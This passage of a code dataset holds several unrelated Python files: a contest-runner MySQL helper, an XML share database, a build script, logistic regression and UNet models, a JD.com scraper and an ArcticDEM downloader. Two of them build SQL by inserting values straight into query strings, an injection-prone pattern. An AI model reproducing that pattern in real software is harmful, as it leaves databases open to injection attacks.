WHERE ProblemID={str(problemID)}\")\n\n for i in range(len(arr)):\n arr[i][0] = str(arr[i][0])\n\n return arr\n\n\ndef PROBLEMS_getProblemTest(problemID: int) -> list:\n arr = executeCommandFetchAll(f\"SELECT ProblemID, ProblemRunInput, ProblemRunOutput, ProblemRunCheckFunction, TimeLimit, MemoryLimit, Difficulty FROM {DATABASE_PROBLEMS} WHERE ProblemID={str(problemID)}\")\n\n for i in range(len(arr)):\n for k in range(1, 3):\n arr[i][k] = arr[i][k].replace(\"\\\\n\", \"\\n\")\n\n return arr\n\n\ndef SUBMISSIONS_getUniqueIDNumber() -> int:\n return executeCommandFetchAll(f\"SELECT MAX(submissionId) FROM {DATABASE_SUBMISSIONS}\")[0][0] + 1\n\n\ndef SUBMISSIONS_createSubmission(submissionUserId: int, submissionProblemId: int, submissionCompiler: str, submissionCode: str, submissionOutput: str, submissionStatus: int) -> str:\n submissionId = SUBMISSIONS_getUniqueIDNumber()\n\n submissionCode = json.dumps(submissionCode)\n submissionCode = submissionCode.replace(\"'\", \"''\")\n\n submissionOutput = json.dumps(submissionOutput)\n submissionOutput = submissionOutput.replace(\"'\", \"''\")\n\n executeCommandCommit(f\"INSERT INTO {DATABASE_SUBMISSIONS} (SubmissionID, SubmissionUserID, SubmissionProblemID, SubmissionCompiler, SubmissionCode, SubmissionOutput, SubmissionStatus) VALUES ({str(submissionId)}, {str(submissionUserId)}, {str(submissionProblemId)}, '{submissionCompiler}', '{submissionCode}', '{submissionOutput}', {str(submissionStatus)})\")\n\n return str(submissionId)\n\n\ndef SUBMISSIONS_getSubmissionString(submissionId: int):\n arr = executeCommandFetchAll(f\"SELECT SubmissionID, SubmissionUserID, SubmissionProblemID, SubmissionCode, SubmissionStatus, SubmissionCompiler FROM {DATABASE_SUBMISSIONS} WHERE SubmissionID={str(submissionId)}\")\n\n for i in range(len(arr)):\n arr[i][0] = str(arr[i][0])\n arr[i][1] = str(arr[i][1])\n arr[i][2] = str(arr[i][2])\n arr[i][3] = json.loads(arr[i][3])\n\n return arr\n\n\n# if __name__ == \"__main__\":\n# # print(ACCOUNT_getUniqueIDNumber())\n\n# # print(PROBLEMS_getProblemsListString())\n# # print(PROBLEMS_getProblemString(1))\n\n# # print(\"'\" == \"\\'\")\n\n# SUBMISSIONS_createSubmission(2, 3, \"python3\", \"\"\"Some cool code\"\"\", \"out\", 1500)\n# print(SUBMISSIONS_getSubmissionString(3))\n\n# # ACCOUNT_createAccount(\"Danny\", \"Kaja\")\n\n# # a = executeCommandFetchAll(f\"SELECT TOP (1000) * FROM {DATABASE_USERACCOUNTS}\")\n# # print(a)\n","repo_name":"robotgenis/CPCRunner","sub_path":"mySQLDatabase.py","file_name":"mySQLDatabase.py","file_ext":"py","file_size_in_byte":4381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36410246718","text":"from xml.dom import minidom\nimport time\nimport math\nimport os\nimport random\nimport hashlib\n\nclass Xmldb:\n \"class to store database information in xml file\"\n\n def __init__(self, fname):\n self.fname = fname\n if not os.path.exists(fname):\n #create document root\n xmlstr = u\"\"\n else:\n #the hack is needed because minidom adds extra whitespaces in file\n xmlstr = \"\"\n with open(fname,\"r\") as f:\n for line in f:\n xmlstr += line.strip(\"\\t\\n\")\n\n try:\n self.doc = minidom.parseString(xmlstr)\n except Exception:\n print(\"found empty xmldb, creating new one\")\n self.doc = minidom.parseString(u\"\")\n\n self.root = self.doc.firstChild\n\n def close(self):\n with open(self.fname, \"w\") as f:\n f.write(self.doc.toprettyxml(\"\\t\", \"\\n\").encode('utf-8'))\n\n def getMaxID(self):\n root_max_id = self.root.getAttribute('maxid')\n if(root_max_id):\n new_id = int(root_max_id)\n else:\n new_id = len(self.doc.getElementsByTagName(\"record\"))\n \n return new_id\n\n\n def setMaxID(self, new_id):\n self.root.setAttribute(u'maxid', str(new_id))\n\n def generateLabel(self):\n timestamp = math.floor(time.time())\n\n #we suggest that this method always generate unique values\n return hashlib.md5(str(timestamp*random.random())).hexdigest()[-5:]\n\n def addRecord(self, label, fname, files):\n new_id = self.getMaxID() + 1\n self.setMaxID(new_id)\n\n timestamp = math.floor(time.time())\n\n #generate node for new record\n new_node = self.doc.createElement(u\"record\")\n new_node.setAttribute(u'id', str(new_id))\n new_node.setAttribute(u'date', str(int(timestamp)))\n new_node.setAttribute(u'label', label)\n new_node.setAttribute(u'dlcount', '0')\n new_node.setAttribute(u'fname', fname.decode(\"utf-8\"))\n\n for fname in files:\n fnode = self.doc.createElement(u\"file\")\n fnode.setAttribute(u\"name\", os.path.basename(fname).decode(\"utf-8\"))\n fnode.setAttribute(u\"origpath\", os.path.dirname(fname).decode(\"utf-8\"))\n new_node.appendChild(fnode)\n \n self.root.appendChild(new_node)\n\n def delRecord(self, id):\n nodes = self.root.getElementsByTagName('record')\n\n for el in nodes:\n if(el.getAttribute('id') == id):\n self.root.removeChild(el)\n return\n\n def delAllRecords(self):\n nodes = self.root.getElementsByTagName('record')\n\n for el in nodes:\n self.removeChild(el)\n\n def getRecordsList(self, searchId = None):\n \"return dictionary with records\"\n res = {}\n\n def makeFname(origPath, fname):\n sep = \"/\" if len(origPath) > 0 else \"\"\n\n return origPath + sep + fname\n\n for el in self.root.getElementsByTagName(\"record\"):\n id = el.getAttribute(\"id\")\n\n hash = {\n \"id\" : id,\n \"label\" : el.getAttribute(\"label\"),\n \"downloadNum\": el.getAttribute(\"dlcount\"),\n \"fname\": el.getAttribute(\"fname\"),\n \"files\": [ makeFname(fel.getAttribute('origpath'), fel.getAttribute(\"name\")) for fel in el.getElementsByTagName(\"file\") ]\n }\n\n if searchId != None and searchId == id:\n obj = {}\n obj[id] = hash\n return obj\n else:\n res[ id ] = hash\n\n if searchId != None:\n return None\n else:\n return res\n\n def getFile(self, id):\n #log.debug(\"searching for id = %s\" % id)\n fid = str(id).strip()\n if (len(fid) != 5): #all ids are exactly 5 chars long\n return None\n\n for rec in self.root.getElementsByTagName('record'):\n testid = rec.getAttribute('label')\n #log.debug(\"testid = %s\" % testid)\n if testid == fid:\n count = int(rec.getAttribute('dlcount')) + 1\n fname = rec.getAttribute('fname')\n rec.setAttribute('dlcount', str(count))\n\n return fname\n return None\n","repo_name":"can3p/share","sub_path":"frontend/fs/model/xmldb.py","file_name":"xmldb.py","file_ext":"py","file_size_in_byte":4310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71218396724","text":"import os;\nimport os.path as osp;\n\n# list of all sconscript files\n# ORDER-SENSITIVE!\n# add your sconscript only AFTER all dependent\nall_ss = [\n\t\t'utils/SConscript',\n\t\t'alg/SConscript',\n\t\t'ga_client/SConscript',\n\t\t'gis_neuro/SConscript'\n\t\t]\n\n# process custom settings\ncustom_env = Environment(ENV = os.environ);\n\nvars = Variables();\nvars.Add('debug', 'Set to 1 to build debug version of hybrid_adapt libs', '1');\nvars.Add('release', 'Set to 1 to build release version of hybrid_adapt libs', '0');\nvars.Add('bs', 'Set to 1 to build BlueSky compatibility layer', '1');\nvars.Add('python_name', 'Specify actual Python interpreter name (with version)', 'python2.7');\nvars.Update(custom_env);\n# try to change def value of build variable\n#custom_env.Replace(debug = 0);\n\n# use distributed compilation\n#custom_env['CC'] = ['distcc'];\n#custom_env['CXX'] = ['distcc'];\ncustom_env.Append(\n\tCCFLAGS = ['-W', '-Wall', '-Wno-deprecated', '-Werror=return-type', '-pthread'], #'-fvisibility=hidden', '-fvisibility-inlines-hidden'],\n\tCPPPATH = [[os.environ['BOOST_PATH']], '#utils', '#utils/include', '#alg/include', '/usr/include/${python_name}'],\n\tLIBPATH = ['/home/uentity/lib/boost/lib'],\n\tRPATH = ['/home/uentity/lib/boost/lib'],\n\tCPPDEFINES = ['UNIX', 'PYTHON_VERSION=27']\n);\n\nif custom_env[\"bs\"] == '1' :\n\tcustom_env.Append(\n\t\tCPPDEFINES = [\n\t\t\t'BLUE_SKY_COMPAT', 'BS_EXPORTING_PLUGIN', 'BSPY_EXPORTING_PLUGIN',\n\t\t\t'PYTHON_VERSION=27', 'BS_EXCEPTION_USE_BOOST_FORMAT', 'BS_DISABLE_MT_LOCKS'\n\t\t],\n\t\tCPPPATH = [\n\t\t\tosp.join(os.environ['BLUE_SKY_PATH'], 'kernel', 'include'),\n\t\t\tosp.join(os.environ['BLUE_SKY_PATH'], 'kernel', 'include', 'python'),\n\t\t\tosp.join(os.environ['BLUE_SKY_PATH'], 'plugins', 'bs-eagle', 'bs_bos_core_base', 'include')\n\t\t],\n\t\tLIBPATH = [\n\t\t\tosp.join(os.environ['BLUE_SKY_PATH'], 'exe', 'debug'),\n\t\t\tosp.join(os.environ['BLUE_SKY_PATH'], 'exe', 'release')\n\t\t],\n\t);\n\nExport('custom_env');\n# generate variables help\nHelp(vars.GenerateHelpText(custom_env));\n\n#print('debug option is: ', custom_env['debug']);\n#print('subst debug option is: ', custom_env.subst('${debug}'));\n#print('release option is: ', custom_env['release']);\n#print('subst release option is: ', custom_env.subst('${release}'));\n\n# Add options telling whether to build release and debug\n# build debug by default\n#AddOption('--ha_debug', dest='ha_debug', help='Set to 1 for building debug', type = 'int', default=1);\n#AddOption('--ha_release', dest='ha_release', help='Set to 1 for building release', type = 'int', default=0);\n\n# parse scons files\n[SConscript(x) for x in all_ss];\n\n","repo_name":"uentity/smadopt","sub_path":"SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"11676081389","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n\r\ndata = pd.read_csv(\"customer_data.csv\")\r\n#print(data)\r\n#print(f\"null values: {data.isnull().sum()}\")\r\n#data.info()\r\n\r\nz = (data - data.min()) / (data.max() - data.min())\r\n#print(z)\r\n\r\n\r\ncorr1=data.corr()['purchased']\r\nprint(corr1.sort_values())\r\ncorr=data.corr()\r\nsns.heatmap(corr,annot=True)\r\nplt.title('Correlation Matrix', fontsize=16)\r\n#plt.show()\r\n\r\nX = z.drop(columns=['purchased'])\r\nY = z['purchased']\r\n#print(X)\r\n#print(Y)\r\nx_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=0.25, random_state=None)\r\n\r\n\r\nclass LogisticRegressionFromScratch():\r\n \r\n def fit(self ,x ,y , alpha , epochs=100):\r\n self.inter= np.ones((x.shape[0], 1))\r\n self.x_train = np.concatenate((self.inter, x), axis=1)\r\n self.y_train = y\r\n self.weight = np.zeros(self.x_train.shape[1])\r\n self.alpha = alpha\r\n self.epochs = epochs\r\n for i in range(self.epochs):\r\n z= self.sigmoid(self.x_train , self.weight)\r\n #self.loss(z ,self.y_train)\r\n dw= self.gradientDescent(self.x_train , self.y_train , z)\r\n self.weight = self.weight - alpha * dw\r\n return self\r\n\r\n\r\n def predict(self , nx , lamda):\r\n self.inter= np.ones((nx.shape[0], 1))\r\n nx = np.concatenate( (self.inter , nx ), axis=1)\r\n res = self.sigmoid(nx , self.weight)\r\n res = res >= lamda\r\n y_pred = np.zeros(res.shape[0])\r\n for i in range(len(y_pred)):\r\n if res[i] == True: \r\n y_pred[i] = 1\r\n else:\r\n continue\r\n \r\n return y_pred\r\n\r\n\r\n\r\n def sigmoid(self , x , weight):\r\n \r\n return 1.0/(1+np.exp(-np.dot(x , weight)))\r\n\r\n def costFunction(y , hx):\r\n return -1* (np.sum(y*np.log(hx) + (1-y) * np.log(1-hx)))\r\n\r\n def gradientDescent(self , x , y , hx):\r\n return np.dot(x.T, (hx - y)) / y.shape[0]\r\n \r\n def loss(self, hx, y):\r\n return (-y * np.log(hx) - (1 - y) * np.log(1 - hx)).mean()\r\n \r\n def accuracy(y , hx):\r\n return np.sum(y==hx) / len(y)\r\n\r\n\r\nalpha = 0\r\nlist = [0.000000001, 0.1 , 0.01 , 0.001 , 0.0001 , 0.00001 , 0.0000001 ]\r\nmax =0\r\nmodel = LogisticRegressionFromScratch()\r\nfor i in range(len(list)):\r\n #print(i)\r\n \r\n model.fit(x_train ,y_train , list[i] , 10000)\r\n hx =model.predict(x_test , 0.5)\r\n acc = (sum(hx == y_test)) / hx.shape[0]\r\n if acc > max:\r\n max = acc\r\n alpha = list[i]\r\n#model = LogisticRegressionFromScratch()\r\nmodel.fit(x_train , y_train , alpha , 10000)\r\nhx =model.predict(x_test , 0.5)\r\nacc = sum(hx == y_test) / hx.shape[0]\r\n\r\nprint(\"accuracy: \",acc *100)\r\nprint(\"alpha: \",alpha)","repo_name":"Ahmed-Essam-AEE/Car-purchases-prediction-using-logestic-regression","sub_path":"LogisticRegressionSc.py","file_name":"LogisticRegressionSc.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18808385118","text":"from collections import OrderedDict\n\nimport torch\nimport torch.nn as nn\nfrom torchvision.utils import save_image\n\n\nclass UNet(nn.Module):\n\n def __init__(self, in_channels=3, out_channels=1, init_features=32, cutpath=False, savefolder=False):\n super(UNet, self).__init__()\n\n features = init_features\n self.cutpath = cutpath\n self.savefolder = savefolder\n self.encoder1 = UNet._block(in_channels, features, name=\"enc1\")\n self.pool1 = nn.MaxPool2d(kernel_size=2, stride=2)\n self.encoder2 = UNet._block(features, features * 2, name=\"enc2\")\n self.pool2 = nn.MaxPool2d(kernel_size=2, stride=2)\n self.encoder3 = UNet._block(features * 2, features * 4, name=\"enc3\")\n self.pool3 = nn.MaxPool2d(kernel_size=2, stride=2)\n self.encoder4 = UNet._block(features * 4, features * 8, name=\"enc4\")\n self.pool4 = nn.MaxPool2d(kernel_size=2, stride=2)\n\n self.bottleneck = UNet._block(features * 8, features * 16, name=\"bottleneck\")\n\n self.upconv4 = nn.ConvTranspose2d(\n features * 16, features * 8, kernel_size=2, stride=2\n )\n self.decoder4 = UNet._block((features * 8) * 2, features * 8, name=\"dec4\")\n self.upconv3 = nn.ConvTranspose2d(\n features * 8, features * 4, kernel_size=2, stride=2\n )\n self.decoder3 = UNet._block((features * 4) * 2, features * 4, name=\"dec3\")\n self.upconv2 = nn.ConvTranspose2d(\n features * 4, features * 2, kernel_size=2, stride=2\n )\n self.decoder2 = UNet._block((features * 2) * 2, features * 2, name=\"dec2\")\n self.upconv1 = nn.ConvTranspose2d(\n features * 2, features, kernel_size=2, stride=2\n )\n self.decoder1 = UNet._block(features * 2, features, name=\"dec1\")\n\n self.conv = nn.Conv2d(\n in_channels=features, out_channels=out_channels, kernel_size=1\n )\n\n def forward(self, x):\n enc1 = self.encoder1(x)\n enc2 = self.encoder2(self.pool1(enc1))\n enc3 = self.encoder3(self.pool2(enc2))\n enc4 = self.encoder4(self.pool3(enc3))\n\n bottleneck = self.bottleneck(self.pool4(enc4))\n\n if self.cutpath:\n enc1 = torch.zeros_like(enc1)\n enc2 = torch.zeros_like(enc2)\n enc3 = torch.zeros_like(enc3)\n enc4 = torch.zeros_like(enc4)\n dec4 = self.upconv4(bottleneck)\n dec4 = torch.cat((dec4, enc4), dim=1)\n dec4 = self.decoder4(dec4)\n dec3 = self.upconv3(dec4)\n dec3 = torch.cat((dec3, enc3), dim=1)\n dec3 = self.decoder3(dec3)\n dec2 = self.upconv2(dec3)\n dec2 = torch.cat((dec2, enc2), dim=1)\n dec2 = self.decoder2(dec2)\n dec1 = self.upconv1(dec2)\n dec1 = torch.cat((dec1, enc1), dim=1)\n dec1 = self.decoder1(dec1)\n\n if self.savefolder:\n save_image(enc1[0].unsqueeze(1), f'{self.savefolder}/enc1_out.jpg')\n save_image(enc2[0].unsqueeze(1), f'{self.savefolder}/enc2_out.jpg')\n save_image(enc3[0].unsqueeze(1), f'{self.savefolder}/enc3_out.jpg')\n save_image(enc4[0].unsqueeze(1), f'{self.savefolder}/enc4_out.jpg')\n save_image(dec1[0].unsqueeze(1), f'{self.savefolder}/dec1_out.jpg')\n save_image(dec2[0].unsqueeze(1), f'{self.savefolder}/dec2_out.jpg')\n save_image(dec3[0].unsqueeze(1), f'{self.savefolder}/dec3_out.jpg')\n save_image(dec4[0].unsqueeze(1), f'{self.savefolder}/dec4_out.jpg')\n save_image(self.encoder1.enc1conv1.weight[:,0].unsqueeze(1),f'{self.savefolder}/encoder1.jpg')\n save_image(self.encoder2.enc2conv1.weight[:,0].unsqueeze(1),f'{self.savefolder}/encoder2.jpg')\n save_image(self.encoder3.enc3conv1.weight[:,0].unsqueeze(1),f'{self.savefolder}/encoder3.jpg')\n save_image(self.encoder4.enc4conv1.weight[:,0].unsqueeze(1),f'{self.savefolder}/encoder4.jpg')\n save_image(self.decoder1.dec1conv1.weight[:,0].unsqueeze(1),f'{self.savefolder}/decoder1.jpg')\n save_image(self.decoder2.dec2conv1.weight[:,0].unsqueeze(1),f'{self.savefolder}/decoder2.jpg')\n save_image(self.decoder3.dec3conv1.weight[:,0].unsqueeze(1),f'{self.savefolder}/decoder3.jpg')\n save_image(self.decoder4.dec4conv1.weight[:,0].unsqueeze(1),f'{self.savefolder}/decoder4.jpg')\n return torch.sigmoid(self.conv(dec1))\n\n @staticmethod\n def _block(in_channels, features, name):\n return nn.Sequential(\n OrderedDict(\n [\n (\n name + \"conv1\",\n nn.Conv2d(\n in_channels=in_channels,\n out_channels=features,\n kernel_size=3,\n padding=1,\n bias=False,\n ),\n ),\n (name + \"norm1\", nn.BatchNorm2d(num_features=features)),\n (name + \"relu1\", nn.ReLU(inplace=True)),\n (\n name + \"conv2\",\n nn.Conv2d(\n in_channels=features,\n out_channels=features,\n kernel_size=3,\n padding=1,\n bias=False,\n ),\n ),\n (name + \"norm2\", nn.BatchNorm2d(num_features=features)),\n (name + \"relu2\", nn.ReLU(inplace=True)),\n ]\n )\n )\n\n\nclass wrapped_UNet(nn.Module):\n def __init__(self, unet, in_ch, out_ch):\n super(wrapped_UNet, self).__init__()\n self.unet = unet\n self.conv = nn.Conv2d(in_ch, out_ch, 1)\n\n def forward(self, x):\n x = self.unet(x)\n x = self.conv(x)\n return x\n","repo_name":"sikidaten/crack_segmentation","sub_path":"unet.py","file_name":"unet.py","file_ext":"py","file_size_in_byte":5886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23346409745","text":"#-*-coding:utf-8*-\n\n# class keyword_sql_joint():\n# # sql语句拼接\ndef keywords_insert_sql_joint(data):\n k = []\n v = []\n # m = []\n # n = []\n # s = []\n # t = []\n #将下列字段插入到jd_keywords数据表里\n try:\n for key, value in data.items():\n if(key!=\"title\" and key!=\"shop_name\" and key!=\"shop_id\" and key!=\"price\" and key!=\"review_count\" and key!=\"shop_link\" and key!=\"image_url\" and value!=\"\"):\n if (key == \"keyword\" or key=='sku' and value != \"\"):\n # value = value.replace(\"\\\"\", \"\\'\")\n value=value.decode(\"utf-8\").encode(\"utf-8\").strip()\n if (key == \"productpage_url\" or key=='last_update_time' and value != \"\"):\n value=value.encode(\"utf-8\").replace(\"\\n\",\"\").strip()\n if(key=='page_id' or key=='page_position' and value!=\"\"):\n value=value\n k.append(\"`\" + key + \"`\")\n v.append('\"' + str(value) + '\"')\n except Exception as err:\n print (err)\n sql_key = \", \".join(k)\n sql_value = \", \".join(v)\n\n # #将下列字段插入到jd_products数据表中\n # try:\n # for key,value in data.items():\n # if(key!=\"keyword\" and key!=\"productpage_url\" and key!=\"page_id\" and key!=\"page_position\" and key!=\"image_url\" and key!=\"last_update_time\" and value!=\"\" ):\n # if(key=='sku' or key=='title' or key=='shop_name' and value!=\"\"):\n # try:\n # value=value.encode(\"utf-8\").strip()\n # except Exception as err:\n # print err\n # if(key=='price' or key=='review_count' or key=='shop_id' and value!=\"\"):\n # try:\n # value=value.strip()\n # except Exception as err:\n # print err\n # if (key == 'shop_link' and value != \"\"):\n # try:\n # value=value.encode(\"utf-8\").strip()\n # except Exception as err:\n # # print err\n # m.append(\"`\" + key + \"`\")\n # n.append('\"' + str(value) + '\"')\n # except Exception as err:\n # print (err)\n # sql_key1 = \", \".join(m)\n # sql_value1 = \", \".join(n)\n\n # #将下列字段插入到jd_product_image数据表中\n # try:\n # for key,value in data.items():\n # if(key=='sku' and value!=\"\"):\n # value=value.encode(\"utf-8\").strip()\n # s.append(\"`\" + key + \"`\")\n # t.append('\"' + str(value) + '\"')\n # except Exception as err:\n # print err\n # sql_key2 = \", \".join(s)\n # sql_value2 = \", \".join(t)\n\n\n try:\n # 插入到jd_keywords中的sql语句\n sql = 'insert into All_Scraper.jd_keywords(' + sql_key + ') VALUES (' + sql_value + ')'\n # #插入到jd_products数据表中的sql语句\n # sql1= 'insert into All_Scraper.jd_products(' + sql_key1 + ') VALUES (' + sql_value1 + ')'\n # #插入到jd_product_image数据表中的语句\n # sql2='insert into All_Scraper.jd_product_image(' + sql_key2 + ') VALUES (' + sql_value2 + ')'\n return sql\n except Exception as err:\n print (err)\n\n","repo_name":"GinVenXi/All_Scraper","sub_path":"all_scraper/Service/JingDongScraper/sql_joint/keyword_sql_joint.py","file_name":"keyword_sql_joint.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"15208183337","text":"#!/usr/bin/env python\n# Filename: download_32m_arcticDEM.py \n\"\"\"\nintroduction: download the mosaci version of ArcticDEM\n\n\nauthors: Huang Lingcao\nemail:huanglingcao@gmail.com\nadd time: 29 April, 2022\n\"\"\"\n\nimport os, sys\nfrom optparse import OptionParser\n\ndeeplabforRS = os.path.expanduser('~/codes/PycharmProjects/DeeplabforRS')\nsys.path.insert(0, deeplabforRS)\nimport vector_gpd\nimport basic_src.map_projection as map_projection\nimport basic_src.io_function as io_function\nimport basic_src.basic as basic\nimport basic_src.RSImageProcess as RSImageProcess\n\n\nfrom ArcticDEM_unpack_registration import process_dem_tarball\n\n# for '2m', should use download_arcticDEM.py to download\nmosaic_res_to_name={10:'10m',32:'32m',100:'100m',500:'500m', 1000:'1km'}\n\ndef wget_file_url(url,save_path):\n # --continue, continue if the previous attempt failed\n cmd_str = 'wget --continue --no-check-certificate --output-document=%s %s' % (save_path,url)\n status, result = basic.exec_command_string(cmd_str)\n return status, result\n\ndef download_tarball_for_one_polygon(tarball_dir,tile_tif_dir,url_head,tile_list, mosaic_res=2):\n for idx, tile_num in enumerate(tile_list):\n dem_name = tile_num + '_' + mosaic_res_to_name[mosaic_res]+'_v3.0'\n tarball_name = dem_name + '.tar.gz'\n tiff_name = dem_name + '_reg_dem.tif'\n tiff_path = os.path.join(tile_tif_dir,tiff_name)\n tarball_path = os.path.join(tarball_dir, tarball_name)\n # print(tiff_path)\n if os.path.isfile(tiff_path) or os.path.isfile(tarball_path):\n print('geotiff or tarball for %s already exists, skip downloading'%dem_name)\n else:\n # download\n url = url_head + tile_num + '/'+tarball_name\n wget_file_url(url,tarball_path)\n\n # unpack\n tar_list = [tarball_path]\n work_dir = './'\n b_rm_inter = True\n b_rm_tarball = False\n process_dem_tarball(tar_list, work_dir, tile_tif_dir, remove_inter_data=b_rm_inter, rm_tarball=b_rm_tarball,\n apply_registration=False)\n\n\ndef create_a_mosaic(pre_name,extent_id,save_dir,extent_poly,tile_list,tile_tif_dir,mosaic_res=2):\n\n # create mosaic\n tif_list = []\n for idx, tile_num in enumerate(tile_list):\n dem_name = tile_num + '_' + mosaic_res_to_name[mosaic_res] + '_v3.0'\n tiff_name = dem_name + '_reg_dem.tif'\n tiff_path = os.path.join(tile_tif_dir,tiff_name)\n if os.path.isfile(tiff_path) is False:\n raise ValueError('%s not exists'%tiff_path)\n tif_list.append(tiff_path)\n\n thread_num = 8\n output_mosaic = os.path.join(save_dir,pre_name + '_ArcticDEM_mosaic_%d'% extent_id + '.tif')\n # create mosaic, can handle only input one file, but is slow\n if os.path.isfile(output_mosaic) is False:\n result = RSImageProcess.mosaic_crop_images_gdalwarp(tif_list, output_mosaic, resampling_method='average',\n o_format='GTiff',\n compress='lzw', tiled='yes', bigtiff='if_safer',\n thread_num=thread_num)\n else:\n print('mosaic: %s exist, skip'%output_mosaic)\n # crop\n output_crop = os.path.join(save_dir,pre_name + '_ArcticDEM_mosaic_%d_crop'% extent_id + '.tif')\n if os.path.isfile(output_crop) is False:\n RSImageProcess.subset_image_by_polygon_box_image_min(output_crop, output_mosaic, extent_poly, resample_m='average',\n o_format='GTiff',\n xres=mosaic_res, yres=mosaic_res, compress='lzw', tiled='yes',\n bigtiff='if_safer', thread_num=thread_num)\n else:\n print('Crop: %s exist, skip'%output_crop)\n\n\ndef main(options, args):\n extent_shp = args[0]\n dem_index_shp = args[1]\n mosaic_res = options.mosaic_resolution\n if mosaic_res not in mosaic_res_to_name.keys():\n raise ValueError('Only accept resolutions in %s'%str([item for item in mosaic_res_to_name.keys()]))\n\n save_folder = options.save_dir + '_' +mosaic_res_to_name[mosaic_res]\n if os.path.isdir(save_folder) is False:\n io_function.mkdir(save_folder)\n save_folder = os.path.abspath(save_folder) # change to absolute path\n\n tarball_dir = os.path.expanduser('ArcticDEM_tile_tarball')\n dem_tif_dir = os.path.expanduser('ArcticDEM_tile_geotiff')\n if os.path.isdir(tarball_dir) is False:\n io_function.mkdir(tarball_dir)\n if os.path.isdir(dem_tif_dir) is False:\n io_function.mkdir(dem_tif_dir)\n\n # extent polygons and projection (proj4)\n extent_shp_prj = map_projection.get_raster_or_vector_srs_info_proj4(extent_shp)\n dem_shp_prj = map_projection.get_raster_or_vector_srs_info_proj4(dem_index_shp)\n\n if extent_shp_prj != dem_shp_prj:\n basic.outputlogMessage('%s and %s do not have the same projection, will reproject %s'\n %(extent_shp,dem_index_shp,os.path.basename(extent_shp)))\n epsg = map_projection.get_raster_or_vector_srs_info_epsg(dem_index_shp)\n # print(epsg)\n # extent_polys = vector_gpd.read_shape_gpd_to_NewPrj(extent_shp,dem_shp_prj.strip())\n extent_polys = vector_gpd.read_shape_gpd_to_NewPrj(extent_shp,epsg)\n else:\n extent_polys = vector_gpd.read_polygons_gpd(extent_shp)\n\n poly_ids = [idx for idx in range(len(extent_polys))]\n extent_name = os.path.splitext(os.path.basename(extent_shp))[0]\n\n # read dem polygons and tile number\n dem_polygons, dem_tiles = vector_gpd.read_polygons_attributes_list(dem_index_shp, 'tile',b_fix_invalid_polygon=False)\n\n for count, (idx, ext_poly) in enumerate(zip(poly_ids, extent_polys)):\n basic.outputlogMessage('get data for the %d th extent (%d/%d)' % (idx, count, len(extent_polys)))\n\n save_txt_path = extent_name +'-'+ 'dem_tiles_poly_%d.txt' % idx\n if os.path.isfile(save_txt_path):\n tiles = io_function.read_list_from_txt(save_txt_path)\n basic.outputlogMessage('read %d dem tiles from %s' % (len(tiles),save_txt_path))\n else:\n # get fileurl\n dem_poly_ids = vector_gpd.get_poly_index_within_extent(dem_polygons,ext_poly)\n basic.outputlogMessage('find %d DEM within %d th extent' % (len(dem_poly_ids), (idx)))\n tiles = [dem_tiles[id] for id in dem_poly_ids]\n\n # save to txt\n io_function.save_list_to_txt(save_txt_path, tiles)\n basic.outputlogMessage('save dem urls to %s' % save_txt_path)\n\n # download and create a mosaic\n url_head = 'https://data.pgc.umn.edu/elev/dem/setsm/ArcticDEM/mosaic/v3.0/%s/'%mosaic_res_to_name[mosaic_res]\n download_tarball_for_one_polygon(tarball_dir, dem_tif_dir, url_head, tiles,mosaic_res=mosaic_res)\n\n # create a mosaic\n extent_name_idx = extent_name + '_%d'%idx\n create_a_mosaic(extent_name_idx, idx, save_folder, ext_poly,tiles,dem_tif_dir,mosaic_res=mosaic_res)\n\n\n\nif __name__ == '__main__':\n usage = \"usage: %prog [options] extent_shp dem_indexes_shp\"\n parser = OptionParser(usage=usage, version=\"1.0 2020-12-25\")\n parser.description = 'Introduction: download ArcticDEM mosaic within an extent at other resolution '\n\n parser.add_option(\"-d\", \"--save_dir\",\n action=\"store\", dest=\"save_dir\", default='ArcticDEM_mosaic',\n help=\"the folder to save DEMs\")\n\n parser.add_option(\"-r\", \"--mosaic_resolution\",\n action=\"store\", dest=\"mosaic_resolution\", type=int, default=10,\n help=\"the resolution of mosaic to download: 10, 32, 100, 500,1000\")\n\n\n (options, args) = parser.parse_args()\n if len(sys.argv) < 2 or len(args) < 1:\n parser.print_help()\n sys.exit(2)\n\n main(options, args)\n","repo_name":"yghlc/rs_data_proc","sub_path":"DEMscripts/download_arcticDEM_mosaic_resolution.py","file_name":"download_arcticDEM_mosaic_resolution.py","file_ext":"py","file_size_in_byte":7965,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"36922118887","text":"import os\nimport matplotlib.pyplot as plt\nimport sys\n\n\ndef get_path():\n dirpath = os.getcwd()\n print(\"Current directory is : \" + dirpath)\n foldername = os.path.basename(dirpath)\n print(\"Current folder name is : \" + foldername)\n scriptpath = os.path.abspath(os.path.dirname(sys.argv[0]))\n print(\"Absolute script path is : \" + scriptpath)\n lib_path = input (\"Enter the directary which store the in-house packages for fast instllation of modules. Otherwise, enter quit: \")\n if lib_path == 'quit':\n return\n else:\n sys.path.append(str(lib_path))\n print(\"\\n An installation-dependent list of packages directories configured at the time virenv Python is used: \")\n return sys.path\n\n\nif __name__ == '__main__':\n get_path()\n\n\n\n\n\n\n\n\n\n","repo_name":"kalufinnle/acs","sub_path":"exec_get_path.py","file_name":"exec_get_path.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"13995248821","text":"from turtle import title\nfrom django.shortcuts import render\nfrom django.shortcuts import redirect\nfrom django.contrib import 